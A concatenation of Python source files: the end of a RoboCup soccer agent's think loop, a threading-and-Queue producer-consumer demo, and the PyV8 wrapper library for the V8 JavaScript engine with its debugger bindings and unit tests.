self.__should_think_on_data = True
def __think_loop(self):
"""
Performs world model analysis and sends appropriate commands to the
server to allow the agent to participate in the current game.
Like the message loop, this SHOULD NOT be called externally. Use the
play method to start play, and the disconnect method to end it.
"""
while self.__thinking:
# tell the ActionHandler to send its enqueued messages if it is time
if self.__send_commands:
self.__send_commands = False
self.wm.ah.send_commands()
# only think if new data has arrived
if self.__should_think_on_data:
# flag that data has been processed. this shouldn't be a race
# condition, since the only change would be to make it True
# before changing it to False again, and we're already going to
# process data, so it doesn't make any difference.
self.__should_think_on_data = False
# performs the actions necessary for the agent to play soccer
self.think()
else:
# prevent burning up all the CPU time while waiting for data
time.sleep(0.0001)
def setup_environment(self):
"""
Called before the think loop starts, this allows the user to store any
variables/objects they'll want access to across subsequent calls to the
think method.
"""
self.in_kick_off_formation = False
def think(self):
"""
Performs a single step of thinking for our agent. Gets called on every
iteration of our think loop.
"""
# DEBUG: tells us if a thread dies
if not self.__think_thread.is_alive() or not self.__msg_thread.is_alive():
raise Exception("A thread died.")
# take places on the field by uniform number
if not self.in_kick_off_formation:
# used to flip x coords for other side
side_mod = 1
if self.wm.side == WorldModel.SIDE_R:
side_mod = -1
if self.wm.uniform_number == 1:
self.wm.teleport_to_point((-5 * side_mod, 30))
elif self.wm.uniform_number == 2:
self.wm.teleport_to_point((-40 * side_mod, 15))
elif self.wm.uniform_number == 3:
self.wm.teleport_to_point((-40 * side_mod, 00))
elif self.wm.uniform_number == 4:
self.wm.teleport_to_point((-40 * side_mod, -15))
elif self.wm.uniform_number == 5:
self.wm.teleport_to_point((-5 * side_mod, -30))
elif self.wm.uniform_number == 6:
self.wm.teleport_to_point((-20 * side_mod, 20))
elif self.wm.uniform_number == 7:
self.wm.teleport_to_point((-20 * side_mod, 0))
elif self.wm.uniform_number == 8:
self.wm.teleport_to_point((-20 * side_mod, -20))
elif self.wm.uniform_number == 9:
self.wm.teleport_to_point((-10 * side_mod, 0))
elif self.wm.uniform_number == 10:
self.wm.teleport_to_point((-10 * side_mod, 20))
elif self.wm.uniform_number == 11:
self.wm.teleport_to_point((-10 * side_mod, -20))
self.in_kick_off_formation = True
return
# determine the enemy goal position
goal_pos = None
if self.wm.side == WorldModel.SIDE_R:
goal_pos = (-55, 0)
else:
goal_pos = (55, 0)
# kick off!
if self.wm.is_before_kick_off():
# player 9 takes the kick off
if self.wm.uniform_number == 9:
if self.wm.is_ball_kickable():
# kick with 100% extra effort at enemy goal
self.wm.kick_to(goal_pos, 1.0)
else:
# move towards ball
if self.wm.ball is not None:
if (self.wm.ball.direction is not None and
-7 <= self.wm.ball.direction <= 7):
self.wm.ah.dash(50)
else:
self.wm.turn_body_to_point((0, 0))
# turn to ball if we can see it, else face the enemy goal
if self.wm.ball is not None:
self.wm.turn_neck_to_object(self.wm.ball)
return
# attack!
else:
# find the ball
if self.wm.ball is None or self.wm.ball.direction is None:
self.wm.ah.turn(30)
return
# kick it at the enemy goal
if self.wm.is_ball_kickable():
self.wm.kick_to(goal_pos, 1.0)
return
else:
# move towards ball
if -7 <= self.wm.ball.direction <= 7:
self.wm.ah.dash(65)
else:
# face ball
self.wm.ah.turn(self.wm.ball.direction / 2)
return
# if __name__ == "__main__":
# import sys
# import multiprocessing as mp
# # enforce correct number of arguments, print help otherwise
# if len(sys.argv) < 3:
# print "args: ./agent.py <team_name> <num_players>"
# sys.exit()
# def spawn_agent(team_name):
# """
# Used to run an agent in a separate physical process.
# """
# a = Agent()
# a.connect("localhost", 6000, team_name)
# a.play()
# # we wait until we're killed
# while 1:
# # we sleep for a good while since we can only exit if terminated.
# time.sleep(1)
# # spawn all agents as separate processes for maximum processing efficiency
# agentthreads = []
# for agent in xrange(min(11, int(sys.argv[2]))):
# print " Spawning agent %d..." % agent
# at = mp.Process(target=spawn_agent, args=(sys.argv[1],))
# at.daemon = True
# at.start()
# agentthreads.append(at)
# print "Spawned %d agents." % len(agentthreads)
# print
# print "Playing soccer..."
# # wait until killed to terminate agent processes
# try:
# while 1:
# time.sleep(0.05)
# except KeyboardInterrupt:
# print
# print "Killing agent threads..."
# # terminate all agent processes
# count = 0
# for at in agentthreads:
# print " Terminating agent %d..." % count
# at.terminate()
# count += 1
# print "Killed %d agent threads." % (count - 1)
# print
# print "Exiting."
# sys.exit()
|
demo_threading_queue.py
|
from queue import Queue
from random import randint
from threading import Thread
from time import sleep
'''
Python 3.x demo combining threading with Queue:
the classic concurrent producer-consumer model.
'''
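# How the demo plays out (illustrative): Queue(2) below bounds the buffer, so
# once two items are queued the producer's put() blocks until the slower
# consumer get()s one; the printed queue sizes therefore stay between 0 and 2.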
class TestQueue(object):
def __init__(self):
self.queue = Queue(2)
def writer(self):
        print('Producer starts writing to the queue.')
self.queue.put('key', block=1)
        print('Producer wrote to the queue. Size is: ' + str(self.queue.qsize()))
def reader(self):
value = self.queue.get(block=1)
        print('Consumer read from the queue. Size is: ' + str(self.queue.qsize()))
    def producer(self):
for i in range(5):
self.writer()
sleep(randint(0, 3))
def consumer(self):
for i in range(5):
self.reader()
sleep(randint(2, 4))
def go(self):
print('TestQueue Start!')
threads = []
        functions = [self.consumer, self.producer]
for func in functions:
thread = Thread(target=func, name=func.__name__)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print('TestQueue Done!')
if __name__ == '__main__':
TestQueue().go()
|
PyV8.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, re
import logging
import collections
is_py3k = sys.version_info[0] > 2
if is_py3k:
import _thread as thread
from io import StringIO
str = str
raw_input = input
else:
    import thread
    try:
        from cStringIO import StringIO
    except ImportError:
        from StringIO import StringIO
try:
import json
except ImportError:
import simplejson as json
import _PyV8
__author__ = 'Flier Lu <flier.lu@gmail.com>'
__version__ = '1.0'
__all__ = ["ReadOnly", "DontEnum", "DontDelete", "Internal",
"JSError", "JSObject", "JSArray", "JSFunction",
"JSClass", "JSEngine", "JSContext",
"JSObjectSpace", "JSAllocationAction",
"JSStackTrace", "JSStackFrame", "profiler",
"JSExtension", "JSLocker", "JSUnlocker", "AST"]
class JSAttribute(object):
def __init__(self, name):
self.name = name
def __call__(self, func):
setattr(func, "__%s__" % self.name, True)
return func
ReadOnly = JSAttribute(name='readonly')
DontEnum = JSAttribute(name='dontenum')
DontDelete = JSAttribute(name='dontdel')
Internal = JSAttribute(name='internal')
class JSError(Exception):
def __init__(self, impl):
Exception.__init__(self)
self._impl = impl
def __str__(self):
return str(self._impl)
def __unicode__(self, *args, **kwargs):
return str(self._impl)
def __getattribute__(self, attr):
impl = super(JSError, self).__getattribute__("_impl")
try:
return getattr(impl, attr)
except AttributeError:
return super(JSError, self).__getattribute__(attr)
RE_FRAME = re.compile(r"\s+at\s(?:new\s)?(?P<func>.+)\s\((?P<file>[^:]+):?(?P<row>\d+)?:?(?P<col>\d+)?\)")
RE_FUNC = re.compile(r"\s+at\s(?:new\s)?(?P<func>.+)\s\((?P<file>[^\)]+)\)")
RE_FILE = re.compile(r"\s+at\s(?P<file>[^:]+):?(?P<row>\d+)?:?(?P<col>\d+)?")
@staticmethod
def parse_stack(value):
stack = []
def int_or_nul(value):
return int(value) if value else None
for line in value.split('\n')[1:]:
m = JSError.RE_FRAME.match(line)
if m:
stack.append((m.group('func'), m.group('file'), int_or_nul(m.group('row')), int_or_nul(m.group('col'))))
continue
m = JSError.RE_FUNC.match(line)
if m:
stack.append((m.group('func'), m.group('file'), None, None))
continue
m = JSError.RE_FILE.match(line)
if m:
stack.append((None, m.group('file'), int_or_nul(m.group('row')), int_or_nul(m.group('col'))))
continue
assert line
return stack
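    # Example (sketch): a V8 trace line such as
    #     at f (test1:2:19)
    # parses to the frame tuple ('f', 'test1', 2, 19), while lines without a
    # function name or source position fall back to the RE_FUNC / RE_FILE
    # patterns and leave the missing fields as None.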
@property
def frames(self):
return self.parse_stack(self.stackTrace)
_PyV8._JSError._jsclass = JSError
JSObject = _PyV8.JSObject
JSArray = _PyV8.JSArray
JSFunction = _PyV8.JSFunction
# contributed by e.generalov
JS_ESCAPABLE = re.compile(r'([^\x00-\x7f])')
HAS_UTF8 = re.compile(r'[\x80-\xff]')
def _js_escape_unicode_re_callback(match):
n = ord(match.group(0))
if n < 0x10000:
return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u%04x\\u%04x' % (s1, s2)
def js_escape_unicode(text):
"""Return an ASCII-only representation of a JavaScript string"""
    if isinstance(text, bytes):
        # byte strings are assumed to be UTF-8; pure ASCII needs no escaping
        if HAS_UTF8.search(text.decode('latin-1')) is None:
            return text.decode('ascii')
        text = text.decode('UTF-8')
    return str(JS_ESCAPABLE.sub(_js_escape_unicode_re_callback, text))
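# Behaviour sketch (assuming the UTF-8 handling above): every character
# outside the ASCII range is replaced by a \uXXXX escape, e.g.
#   js_escape_unicode(u'caf\xe9')  ->  'caf\\u00e9'
# and characters outside the BMP are emitted as a surrogate pair.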
class JSExtension(_PyV8.JSExtension):
def __init__(self, name, source, callback=None, dependencies=[], register=True):
_PyV8.JSExtension.__init__(self, js_escape_unicode(name), js_escape_unicode(source), callback, dependencies, register)
def func_apply(self, thisArg, argArray=[]):
if isinstance(thisArg, JSObject):
return self.invoke(thisArg, argArray)
this = JSContext.current.eval("(%s)" % json.dumps(thisArg))
return self.invoke(this, argArray)
JSFunction.apply = func_apply
class JSLocker(_PyV8.JSLocker):
def __enter__(self):
self.enter()
if JSContext.entered:
self.leave()
raise RuntimeError("Lock should be acquired before enter the context")
return self
def __exit__(self, exc_type, exc_value, traceback):
if JSContext.entered:
self.leave()
raise RuntimeError("Lock should be released after leave the context")
self.leave()
if is_py3k:
def __bool__(self):
return self.entered()
else:
def __nonzero__(self):
return self.entered()
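# Ordering sketch (see the checks in __enter__/__exit__ above and
# TestMultithread.testLocker below): take the JSLocker first, then enter a
# JSContext inside it; entering the locker while a context is already
# entered raises RuntimeError.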
class JSUnlocker(_PyV8.JSUnlocker):
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
if is_py3k:
def __bool__(self):
return self.entered()
else:
def __nonzero__(self):
return self.entered()
class JSClass(object):
__properties__ = {}
__watchpoints__ = {}
def __getattr__(self, name):
if name == 'constructor':
return JSClassConstructor(self.__class__)
if name == 'prototype':
return JSClassPrototype(self.__class__)
prop = self.__dict__.setdefault('__properties__', {}).get(name, None)
if prop and isinstance(prop[0], collections.Callable):
return prop[0]()
raise AttributeError(name)
def __setattr__(self, name, value):
prop = self.__dict__.setdefault('__properties__', {}).get(name, None)
if prop and isinstance(prop[1], collections.Callable):
return prop[1](value)
return object.__setattr__(self, name, value)
def toString(self):
"Returns a string representation of an object."
return "[object %s]" % self.__class__.__name__
def toLocaleString(self):
"Returns a value as a string value appropriate to the host environment's current locale."
return self.toString()
def valueOf(self):
"Returns the primitive value of the specified object."
return self
def hasOwnProperty(self, name):
"Returns a Boolean value indicating whether an object has a property with the specified name."
return hasattr(self, name)
def isPrototypeOf(self, obj):
"Returns a Boolean value indicating whether an object exists in the prototype chain of another object."
raise NotImplementedError()
def __defineGetter__(self, name, getter):
"Binds an object's property to a function to be called when that property is looked up."
self.__properties__[name] = (getter, self.__lookupSetter__(name))
def __lookupGetter__(self, name):
"Return the function bound as a getter to the specified property."
return self.__properties__.get(name, (None, None))[0]
def __defineSetter__(self, name, setter):
"Binds an object's property to a function to be called when an attempt is made to set that property."
self.__properties__[name] = (self.__lookupGetter__(name), setter)
def __lookupSetter__(self, name):
"Return the function bound as a setter to the specified property."
return self.__properties__.get(name, (None, None))[1]
def watch(self, prop, handler):
"Watches for a property to be assigned a value and runs a function when that occurs."
self.__watchpoints__[prop] = handler
def unwatch(self, prop):
"Removes a watchpoint set with the watch method."
del self.__watchpoints__[prop]
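# Usage sketch for the watch/unwatch hooks above (mirrors TestWrapper.testWatch
# below): from JavaScript,
#   o.watch("p", function (id, oldval, newval) { return oldval + newval; });
# routes every assignment to o.p through the handler until o.unwatch('p').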
class JSClassConstructor(JSClass):
def __init__(self, cls):
self.cls = cls
@property
def name(self):
return self.cls.__name__
def toString(self):
return "function %s() {\n [native code]\n}" % self.name
def __call__(self, *args, **kwds):
return self.cls(*args, **kwds)
class JSClassPrototype(JSClass):
def __init__(self, cls):
self.cls = cls
@property
def constructor(self):
return JSClassConstructor(self.cls)
@property
def name(self):
return self.cls.__name__
class JSDebugProtocol(object):
"""
    Support the V8 debugger JSON-based protocol.
<http://code.google.com/p/v8/wiki/DebuggerProtocol>
"""
class Packet(object):
REQUEST = 'request'
RESPONSE = 'response'
EVENT = 'event'
def __init__(self, payload):
            self.data = json.loads(payload) if isinstance(payload, str) else payload
@property
def seq(self):
return self.data['seq']
@property
def type(self):
return self.data['type']
class Request(Packet):
@property
def cmd(self):
return self.data['command']
@property
def args(self):
return self.data['args']
class Response(Packet):
@property
def request_seq(self):
return self.data['request_seq']
@property
def cmd(self):
return self.data['command']
@property
def body(self):
return self.data['body']
@property
def running(self):
return self.data['running']
@property
def success(self):
return self.data['success']
@property
def message(self):
return self.data['message']
class Event(Packet):
@property
def event(self):
return self.data['event']
@property
def body(self):
return self.data['body']
def __init__(self):
self.seq = 0
def nextSeq(self):
seq = self.seq
self.seq += 1
return seq
def parsePacket(self, payload):
obj = json.loads(payload)
return JSDebugProtocol.Event(obj) if obj['type'] == 'event' else JSDebugProtocol.Response(obj)
class JSDebugEvent(_PyV8.JSDebugEvent):
class FrameData(object):
def __init__(self, frame, count, name, value):
self.frame = frame
self.count = count
self.name = name
self.value = value
def __len__(self):
return self.count(self.frame)
def __iter__(self):
for i in range(self.count(self.frame)):
yield (self.name(self.frame, i), self.value(self.frame, i))
class Frame(object):
def __init__(self, frame):
self.frame = frame
@property
def index(self):
return int(self.frame.index())
@property
def function(self):
return self.frame.func()
@property
def receiver(self):
return self.frame.receiver()
@property
def isConstructCall(self):
return bool(self.frame.isConstructCall())
@property
def isDebuggerFrame(self):
return bool(self.frame.isDebuggerFrame())
@property
def argumentCount(self):
return int(self.frame.argumentCount())
def argumentName(self, idx):
return str(self.frame.argumentName(idx))
def argumentValue(self, idx):
return self.frame.argumentValue(idx)
@property
def arguments(self):
return JSDebugEvent.FrameData(self, self.argumentCount, self.argumentName, self.argumentValue)
def localCount(self, idx):
return int(self.frame.localCount())
def localName(self, idx):
return str(self.frame.localName(idx))
def localValue(self, idx):
return self.frame.localValue(idx)
@property
def locals(self):
return JSDebugEvent.FrameData(self, self.localCount, self.localName, self.localValue)
@property
def sourcePosition(self):
return self.frame.sourcePosition()
@property
def sourceLine(self):
return int(self.frame.sourceLine())
@property
def sourceColumn(self):
return int(self.frame.sourceColumn())
@property
def sourceLineText(self):
return str(self.frame.sourceLineText())
def evaluate(self, source, disable_break = True):
return self.frame.evaluate(source, disable_break)
@property
def invocationText(self):
return str(self.frame.invocationText())
@property
def sourceAndPositionText(self):
return str(self.frame.sourceAndPositionText())
@property
def localsText(self):
return str(self.frame.localsText())
def __str__(self):
return str(self.frame.toText())
class Frames(object):
def __init__(self, state):
self.state = state
def __len__(self):
return self.state.frameCount
def __iter__(self):
for i in range(self.state.frameCount):
yield self.state.frame(i)
class State(object):
def __init__(self, state):
self.state = state
@property
def frameCount(self):
return int(self.state.frameCount())
def frame(self, idx = None):
return JSDebugEvent.Frame(self.state.frame(idx))
@property
def selectedFrame(self):
return int(self.state.selectedFrame())
@property
def frames(self):
return JSDebugEvent.Frames(self)
def __repr__(self):
s = StringIO()
try:
for frame in self.frames:
s.write(str(frame))
return s.getvalue()
finally:
s.close()
class DebugEvent(object):
pass
class StateEvent(DebugEvent):
__state = None
@property
def state(self):
if not self.__state:
self.__state = JSDebugEvent.State(self.event.executionState())
return self.__state
class BreakEvent(StateEvent):
type = _PyV8.JSDebugEvent.Break
def __init__(self, event):
self.event = event
class ExceptionEvent(StateEvent):
type = _PyV8.JSDebugEvent.Exception
def __init__(self, event):
self.event = event
class NewFunctionEvent(DebugEvent):
type = _PyV8.JSDebugEvent.NewFunction
def __init__(self, event):
self.event = event
class Script(object):
def __init__(self, script):
self.script = script
@property
def source(self):
return self.script.source()
@property
def id(self):
return self.script.id()
@property
def name(self):
return self.script.name()
@property
def lineOffset(self):
return self.script.lineOffset()
@property
def lineCount(self):
return self.script.lineCount()
@property
def columnOffset(self):
return self.script.columnOffset()
@property
def type(self):
return self.script.type()
def __repr__(self):
return "<%s script %s @ %d:%d> : '%s'" % (self.type, self.name,
self.lineOffset, self.columnOffset,
self.source)
class CompileEvent(StateEvent):
def __init__(self, event):
self.event = event
@property
def script(self):
if not hasattr(self, "_script"):
setattr(self, "_script", JSDebugEvent.Script(self.event.script()))
return self._script
def __str__(self):
return str(self.script)
class BeforeCompileEvent(CompileEvent):
type = _PyV8.JSDebugEvent.BeforeCompile
def __init__(self, event):
JSDebugEvent.CompileEvent.__init__(self, event)
def __repr__(self):
return "before compile script: %s\n%s" % (repr(self.script), repr(self.state))
class AfterCompileEvent(CompileEvent):
type = _PyV8.JSDebugEvent.AfterCompile
def __init__(self, event):
JSDebugEvent.CompileEvent.__init__(self, event)
def __repr__(self):
return "after compile script: %s\n%s" % (repr(self.script), repr(self.state))
onMessage = None
onBreak = None
onException = None
onNewFunction = None
onBeforeCompile = None
onAfterCompile = None
class JSDebugger(JSDebugProtocol, JSDebugEvent):
def __init__(self):
JSDebugProtocol.__init__(self)
JSDebugEvent.__init__(self)
def __enter__(self):
self.enabled = True
return self
def __exit__(self, exc_type, exc_value, traceback):
self.enabled = False
@property
def context(self):
if not hasattr(self, '_context'):
self._context = JSContext(ctxt=_PyV8.debug().context)
return self._context
def isEnabled(self):
return _PyV8.debug().enabled
def setEnabled(self, enable):
dbg = _PyV8.debug()
if enable:
dbg.onDebugEvent = self.onDebugEvent
dbg.onDebugMessage = self.onDebugMessage
dbg.onDispatchDebugMessages = self.onDispatchDebugMessages
else:
dbg.onDebugEvent = None
dbg.onDebugMessage = None
dbg.onDispatchDebugMessages = None
dbg.enabled = enable
enabled = property(isEnabled, setEnabled)
def onDebugMessage(self, msg, data):
if self.onMessage:
self.onMessage(json.loads(msg))
def onDebugEvent(self, type, state, evt):
if type == JSDebugEvent.Break:
if self.onBreak: self.onBreak(JSDebugEvent.BreakEvent(evt))
elif type == JSDebugEvent.Exception:
if self.onException: self.onException(JSDebugEvent.ExceptionEvent(evt))
elif type == JSDebugEvent.NewFunction:
if self.onNewFunction: self.onNewFunction(JSDebugEvent.NewFunctionEvent(evt))
elif type == JSDebugEvent.BeforeCompile:
if self.onBeforeCompile: self.onBeforeCompile(JSDebugEvent.BeforeCompileEvent(evt))
elif type == JSDebugEvent.AfterCompile:
if self.onAfterCompile: self.onAfterCompile(JSDebugEvent.AfterCompileEvent(evt))
def onDispatchDebugMessages(self):
return True
def debugBreak(self):
_PyV8.debug().debugBreak()
def debugBreakForCommand(self):
_PyV8.debug().debugBreakForCommand()
def cancelDebugBreak(self):
_PyV8.debug().cancelDebugBreak()
def processDebugMessages(self):
_PyV8.debug().processDebugMessages()
def sendCommand(self, cmd, *args, **kwds):
request = json.dumps({
'seq': self.nextSeq(),
'type': 'request',
'command': cmd,
'arguments': kwds
})
_PyV8.debug().sendCommand(request)
return request
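    # Sketch: keyword arguments become the request's "arguments" object, so
    #   debugger.sendCommand('evaluate', expression='1+2')
    # would queue {"seq": N, "type": "request", "command": "evaluate",
    #              "arguments": {"expression": "1+2"}}; 'evaluate' and
    # 'expression' are illustrative names, not part of this wrapper itself.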
def debugContinue(self, action='next', steps=1):
return self.sendCommand('continue', stepaction=action)
def stepNext(self, steps=1):
"""Step to the next statement in the current function."""
return self.debugContinue(action='next', steps=steps)
def stepIn(self, steps=1):
"""Step into new functions invoked or the next statement in the current function."""
return self.debugContinue(action='in', steps=steps)
def stepOut(self, steps=1):
"""Step out of the current function."""
return self.debugContinue(action='out', steps=steps)
def stepMin(self, steps=1):
"""Perform a minimum step in the current function."""
return self.debugContinue(action='out', steps=steps)
class JSProfiler(_PyV8.JSProfiler):
@property
def logs(self):
pos = 0
while True:
size, buf = self.getLogLines(pos)
if size == 0:
break
for line in buf.split('\n'):
yield line
pos += size
profiler = JSProfiler()
JSObjectSpace = _PyV8.JSObjectSpace
JSAllocationAction = _PyV8.JSAllocationAction
class JSEngine(_PyV8.JSEngine):
def __init__(self):
_PyV8.JSEngine.__init__(self)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
del self
JSScript = _PyV8.JSScript
JSStackTrace = _PyV8.JSStackTrace
JSStackTrace.Options = _PyV8.JSStackTraceOptions
JSStackFrame = _PyV8.JSStackFrame
class JSIsolate(_PyV8.JSIsolate):
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
del self
class JSContext(_PyV8.JSContext):
def __init__(self, obj=None, extensions=None, ctxt=None):
if JSLocker.active:
self.lock = JSLocker()
self.lock.enter()
if ctxt:
_PyV8.JSContext.__init__(self, ctxt)
else:
_PyV8.JSContext.__init__(self, obj, extensions or [])
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
if hasattr(JSLocker, 'lock'):
self.lock.leave()
self.lock = None
del self
# contributed by marc boeker <http://code.google.com/u/marc.boeker/>
def convert(obj):
if type(obj) == _PyV8.JSArray:
return [convert(v) for v in obj]
if type(obj) == _PyV8.JSObject:
return dict([[str(k), convert(obj.__getattr__(str(k)))] for k in (obj.__dir__() if is_py3k else obj.__members__)])
return obj
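# Sketch of what convert() yields: nested JSArray/JSObject wrappers become
# plain Python lists and dicts, e.g. the object literal built in
# TestWrapper.testDict below converts to {'a': 1, 'b': [1, 2, 3], ...}.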
class AST:
Scope = _PyV8.AstScope
VarMode = _PyV8.AstVariableMode
Var = _PyV8.AstVariable
Label = _PyV8.AstLabel
NodeType = _PyV8.AstNodeType
Node = _PyV8.AstNode
Statement = _PyV8.AstStatement
Expression = _PyV8.AstExpression
Breakable = _PyV8.AstBreakableStatement
Block = _PyV8.AstBlock
Declaration = _PyV8.AstDeclaration
VariableDeclaration = _PyV8.AstVariableDeclaration
Module = _PyV8.AstModule
ModuleDeclaration = _PyV8.AstModuleDeclaration
ModuleLiteral = _PyV8.AstModuleLiteral
ModuleVariable = _PyV8.AstModuleVariable
ModulePath = _PyV8.AstModulePath
Iteration = _PyV8.AstIterationStatement
DoWhile = _PyV8.AstDoWhileStatement
While = _PyV8.AstWhileStatement
For = _PyV8.AstForStatement
ForIn = _PyV8.AstForInStatement
ExpressionStatement = _PyV8.AstExpressionStatement
Continue = _PyV8.AstContinueStatement
Break = _PyV8.AstBreakStatement
Return = _PyV8.AstReturnStatement
With = _PyV8.AstWithStatement
Case = _PyV8.AstCaseClause
Switch = _PyV8.AstSwitchStatement
Try = _PyV8.AstTryStatement
TryCatch = _PyV8.AstTryCatchStatement
TryFinally = _PyV8.AstTryFinallyStatement
Debugger = _PyV8.AstDebuggerStatement
Empty = _PyV8.AstEmptyStatement
Literal = _PyV8.AstLiteral
MaterializedLiteral = _PyV8.AstMaterializedLiteral
PropertyKind = _PyV8.AstPropertyKind
ObjectProperty = _PyV8.AstObjectProperty
Object = _PyV8.AstObjectLiteral
RegExp = _PyV8.AstRegExpLiteral
Array = _PyV8.AstArrayLiteral
VarProxy = _PyV8.AstVariableProxy
Property = _PyV8.AstProperty
Call = _PyV8.AstCall
CallNew = _PyV8.AstCallNew
CallRuntime = _PyV8.AstCallRuntime
Op = _PyV8.AstOperation
UnaryOp = _PyV8.AstUnaryOperation
BinOp = _PyV8.AstBinaryOperation
CountOp = _PyV8.AstCountOperation
CompOp = _PyV8.AstCompareOperation
Conditional = _PyV8.AstConditional
Assignment = _PyV8.AstAssignment
Throw = _PyV8.AstThrow
Function = _PyV8.AstFunctionLiteral
SharedFunction = _PyV8.AstSharedFunctionInfoLiteral
This = _PyV8.AstThisFunction
from datetime import *
import unittest
import traceback
if is_py3k:
def toNativeString(s):
return s
def toUnicodeString(s):
return s
else:
def toNativeString(s, encoding='utf-8'):
return s.encode(encoding) if isinstance(s, str) else s
def toUnicodeString(s, encoding='utf-8'):
return s if isinstance(s, str) else str(s, encoding)
class TestContext(unittest.TestCase):
def testMultiNamespace(self):
self.assertTrue(not bool(JSContext.inContext))
self.assertTrue(not bool(JSContext.entered))
class Global(object):
name = "global"
g = Global()
with JSContext(g) as ctxt:
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(g.name, str(JSContext.entered.locals.name))
self.assertEqual(g.name, str(JSContext.current.locals.name))
class Local(object):
name = "local"
l = Local()
with JSContext(l):
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(l.name, str(JSContext.entered.locals.name))
self.assertEqual(l.name, str(JSContext.current.locals.name))
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(g.name, str(JSContext.entered.locals.name))
self.assertEqual(g.name, str(JSContext.current.locals.name))
self.assertTrue(not bool(JSContext.entered))
self.assertTrue(not bool(JSContext.inContext))
def _testMultiContext(self):
# Create an environment
with JSContext() as ctxt0:
ctxt0.securityToken = "password"
global0 = ctxt0.locals
global0.custom = 1234
self.assertEqual(1234, int(global0.custom))
# Create an independent environment
with JSContext() as ctxt1:
ctxt1.securityToken = ctxt0.securityToken
global1 = ctxt1.locals
global1.custom = 1234
with ctxt0:
self.assertEqual(1234, int(global0.custom))
self.assertEqual(1234, int(global1.custom))
# Now create a new context with the old global
with JSContext(global1) as ctxt2:
ctxt2.securityToken = ctxt1.securityToken
with ctxt1:
self.assertEqual(1234, int(global1.custom))
def _testSecurityChecks(self):
with JSContext() as env1:
env1.securityToken = "foo"
# Create a function in env1.
env1.eval("spy=function(){return spy;}")
spy = env1.locals.spy
self.assertTrue(isinstance(spy, _PyV8.JSFunction))
# Create another function accessing global objects.
env1.eval("spy2=function(){return 123;}")
spy2 = env1.locals.spy2
self.assertTrue(isinstance(spy2, _PyV8.JSFunction))
# Switch to env2 in the same domain and invoke spy on env2.
env2 = JSContext()
env2.securityToken = "foo"
with env2:
result = spy.apply(env2.locals)
self.assertTrue(isinstance(result, _PyV8.JSFunction))
env2.securityToken = "bar"
# Call cross_domain_call, it should throw an exception
with env2:
self.assertRaises(JSError, spy2.apply, env2.locals)
def _testCrossDomainDelete(self):
with JSContext() as env1:
env2 = JSContext()
# Set to the same domain.
env1.securityToken = "foo"
env2.securityToken = "foo"
env1.locals.prop = 3
env2.locals.env1 = env1.locals
# Change env2 to a different domain and delete env1.prop.
#env2.securityToken = "bar"
self.assertEqual(3, int(env1.eval("prop")))
with env2:
self.assertEqual(3, int(env2.eval("this.env1.prop")))
self.assertEqual("false", str(env2.eval("delete env1.prop")))
# Check that env1.prop still exists.
self.assertEqual(3, int(env1.locals.prop))
class TestWrapper(unittest.TestCase):
def testObject(self):
with JSContext() as ctxt:
o = ctxt.eval("new Object()")
self.assertTrue(hash(o) > 0)
o1 = o.clone()
self.assertEqual(hash(o1), hash(o))
self.assertTrue(o != o1)
self.assertRaises(UnboundLocalError, o.clone)
def testAutoConverter(self):
with JSContext() as ctxt:
ctxt.eval("""
var_i = 1;
var_f = 1.0;
var_s = "test";
var_b = true;
var_s_obj = new String("test");
var_b_obj = new Boolean(true);
var_f_obj = new Number(1.5);
""")
vars = ctxt.locals
var_i = vars.var_i
self.assertTrue(var_i)
self.assertEqual(1, int(var_i))
var_f = vars.var_f
self.assertTrue(var_f)
self.assertEqual(1.0, float(vars.var_f))
var_s = vars.var_s
self.assertTrue(var_s)
self.assertEqual("test", str(vars.var_s))
var_b = vars.var_b
self.assertTrue(var_b)
self.assertTrue(bool(var_b))
self.assertEqual("test", vars.var_s_obj)
self.assertTrue(vars.var_b_obj)
self.assertEqual(1.5, vars.var_f_obj)
attrs = dir(ctxt.locals)
self.assertTrue(attrs)
self.assertTrue("var_i" in attrs)
self.assertTrue("var_f" in attrs)
self.assertTrue("var_s" in attrs)
self.assertTrue("var_b" in attrs)
self.assertTrue("var_s_obj" in attrs)
self.assertTrue("var_b_obj" in attrs)
self.assertTrue("var_f_obj" in attrs)
def testExactConverter(self):
class MyInteger(int, JSClass):
pass
class MyString(str, JSClass):
pass
class MyUnicode(str, JSClass):
pass
class MyDateTime(time, JSClass):
pass
class Global(JSClass):
var_bool = True
var_int = 1
var_float = 1.0
var_str = 'str'
var_unicode = 'unicode'
var_datetime = datetime.now()
var_date = date.today()
var_time = time()
var_myint = MyInteger()
var_mystr = MyString('mystr')
var_myunicode = MyUnicode('myunicode')
var_mytime = MyDateTime()
with JSContext(Global()) as ctxt:
typename = ctxt.eval("(function (name) { return this[name].constructor.name; })")
typeof = ctxt.eval("(function (name) { return typeof(this[name]); })")
self.assertEqual('Boolean', typename('var_bool'))
self.assertEqual('Number', typename('var_int'))
self.assertEqual('Number', typename('var_float'))
self.assertEqual('String', typename('var_str'))
self.assertEqual('String', typename('var_unicode'))
self.assertEqual('Date', typename('var_datetime'))
self.assertEqual('Date', typename('var_date'))
self.assertEqual('Date', typename('var_time'))
self.assertEqual('MyInteger', typename('var_myint'))
self.assertEqual('MyString', typename('var_mystr'))
self.assertEqual('MyUnicode', typename('var_myunicode'))
self.assertEqual('MyDateTime', typename('var_mytime'))
self.assertEqual('object', typeof('var_myint'))
self.assertEqual('object', typeof('var_mystr'))
self.assertEqual('object', typeof('var_myunicode'))
self.assertEqual('object', typeof('var_mytime'))
def testJavascriptWrapper(self):
with JSContext() as ctxt:
self.assertEqual(type(None), type(ctxt.eval("null")))
self.assertEqual(type(None), type(ctxt.eval("undefined")))
self.assertEqual(bool, type(ctxt.eval("true")))
self.assertEqual(str, type(ctxt.eval("'test'")))
self.assertEqual(int, type(ctxt.eval("123")))
